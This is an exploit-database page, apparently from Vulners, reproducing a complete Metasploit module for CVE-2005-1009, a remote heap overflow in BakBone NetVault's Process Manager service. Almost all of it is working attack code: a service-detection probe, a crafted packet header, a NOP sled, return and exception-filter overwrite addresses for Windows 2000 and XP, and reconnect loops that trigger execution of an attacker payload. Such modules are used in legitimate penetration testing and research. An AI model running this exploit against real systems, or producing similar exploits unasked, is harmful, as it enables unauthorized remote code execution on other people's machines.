BakBone NetVault Remote Heap Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType
BakBone NetVault Remote Heap Overflo

                                                ##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;BakBone NetVault Remote Heap Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
		This module exploits a heap overflow in the BakBone NetVault
	Process Manager service. This code is a direct port of the netvault.c
	code written by nolimit and BuzzDee.
			},
			&#39;Author&#39;         =&#62; [ &#39;hdm&#39;, &#39;&#60;nolimit.bugtraq[at]ri0tnet.net&#62;&#39; ],
			&#39;Version&#39;        =&#62; &#39;$Revision: 10394 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;CVE&#39;, &#39;2005-1009&#39;],
					[&#39;OSVDB&#39;, &#39;15234&#39;],
					[&#39;BID&#39;, &#39;12967&#39;],
				],
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 1024,
					&#39;BadChars&#39; =&#62; &#34;\x00\x20&#34;,
					&#39;PrependEncoder&#39; =&#62; &#34;\x81\xc4\xff\xef\xff\xff\x44&#34;,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[&#39;Windows 2000 SP4 English&#39;,   { &#39;Ret&#39; =&#62; 0x75036d7e, &#39;UEF&#39; =&#62; 0x7c54144c } ],
					[&#39;Windows XP SP0/SP1 English&#39;, { &#39;Ret&#39; =&#62; 0x7c369bbd, &#39;UEF&#39; =&#62; 0x77ed73b4 } ],
				],

			&#39;Privileged&#39;     =&#62; false,
			&#39;DisclosureDate&#39; =&#62; &#39;Apr 01 2005&#39;
			))

			register_options(
			[
				Opt::RPORT(20031)
			], self.class)
	end

	def check
		connect

		hname = &#34;METASPLOIT&#34;
		probe =
			&#34;\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69&#34; +
			&#34;\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69&#34; +
			&#34;\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00&#34; +
			&#34;\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00&#34; +
			[ hname.length + 1 ].pack(&#39;V&#39;) + hname + &#34;\x00&#34;
		probe += &#34;\x00&#34; * (201 - probe.length)

		sock.put(probe)
		res = sock.get_once(1, 10)

		off = (res || &#39;&#39;).index(&#34;NVBuild&#34;)

		if off
			off += 21
			ver  = res[off + 4, res[off, 4].unpack(&#39;V&#39;)[0]].to_i

			if ver &#62; 0
				print_status(&#34;Detected NetVault Build #{ver}&#34;)
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status(&#34;Trying target #{target.name}...&#34;)

		head =
			&#34;\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69&#34; +
			&#34;\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01&#34; +
			&#34;\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97&#34; +
			&#34;\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10&#34; +
			&#34;\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01&#34; +
			&#34;\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00&#34; +
			&#34;\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20&#34; +
			&#34;\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34; +
			&#34;\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca&#34; +
			&#34;\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e&#34; +
			&#34;\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e&#34; +
			&#34;\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02&#34;

		pattern = make_nops(39947) + &#34;\x00\x00\x00&#34;
		p       = payload.encoded

		pattern[0, head.length]  = head
		pattern[32790, 2]        = &#34;\xeb\x0a&#34;
		pattern[32792, 4]        = [ target.ret ].pack(&#39;V&#39;)
		pattern[32796, 4]        = [ target[&#39;UEF&#39;] ].pack(&#39;V&#39;)
		pattern[32800, p.length] = p

		sent = 0
		try  = 0

		15.times {
			try += 1
			connect
			sent = sock.put(pattern)
			disconnect
			break if sent == pattern.length
		}

		if (try == 15)
			print_error(&#34;Could not write full packet to server.&#34;)
			return
		end

		print_status(&#34;Overflow request sent, sleeping fo four seconds (#{try} tries)&#34;)
		select(nil,nil,nil,4)

		print_status(&#34;Attempting to trigger memory overwrite by reconnecting...&#34;)

		begin
			10.times { |x|
				connect
				sock.put(pattern)
				print_status(&#34;   Completed connection #{x}&#34;)
				sock.get_once(1, 1)
				disconnect
			}
		rescue
		end

		print_status(&#34;Waiting for payload to execute...&#34;)

		handler
		disconnect
	end

	def wfs_delay
		5
	end

end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1